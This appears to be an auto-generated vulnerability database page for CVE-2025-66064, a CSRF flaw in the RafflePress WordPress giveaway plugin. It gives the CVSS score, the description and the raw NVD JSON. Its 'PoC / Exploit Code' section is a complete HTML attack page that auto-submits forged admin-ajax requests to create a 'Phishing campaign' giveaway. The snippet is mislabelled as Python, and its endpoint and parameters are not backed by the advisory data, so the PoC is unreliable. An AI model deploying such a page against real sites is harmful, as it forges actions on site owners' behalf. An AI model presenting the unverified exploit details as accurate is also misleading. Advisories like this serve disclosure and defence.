Security Vulnerability Report
中文
CVE-2025-66064 CVSS 4.3 MEDIUM

CVE-2025-66064

Published: 2025-11-21 13:15:47
Last Modified: 2026-04-27 18:16:32

Description

Cross-Site Request Forgery (CSRF) vulnerability in Syed Balkhi Giveaways and Contests by RafflePress rafflepress allows Cross Site Request Forgery.This issue affects Giveaways and Contests by RafflePress: from n/a through <= 1.12.20.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

RafflePress插件 <= 1.12.20(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-66064 --> <!-- This PoC demonstrates the CSRF vulnerability in RafflePress plugin --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-66064</title> </head> <body> <h1>CSRF Attack PoC for RafflePress Plugin</h1> <p>This PoC demonstrates how an attacker can exploit the CSRF vulnerability.</p> <!-- Form to create a malicious giveaway --> <form id="csrfForm" action="http://target-site.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="rafflepress_create_giveaway"> <input type="hidden" name="giveaway_title" value="Malicious Giveaway"> <input type="hidden" name="giveaway_description" value="Phishing campaign"> <input type="hidden" name="nonce" value=""> <!-- Additional malicious parameters --> </form> <script> // Auto-submit form without user interaction document.getElementById('csrfForm').submit(); // Alternative: Fetch API request fetch('http://target-site.com/wp-admin/admin-ajax.php', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=rafflepress_create_giveaway&giveaway_title=CSRF+Attack&nonce=' }); </script> <p>If you see this message, the attack has been executed.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66064", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:47.337", "lastModified": "2026-04-27T18:16:32.423", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Syed Balkhi Giveaways and Contests by RafflePress rafflepress allows Cross Site Request Forgery.This issue affects Giveaways and Contests by RafflePress: from n/a through <= 1.12.20."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/rafflepress/vulnerability/wordpress-giveaways-and-contests-by-rafflepress-plugin-1-12-20-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}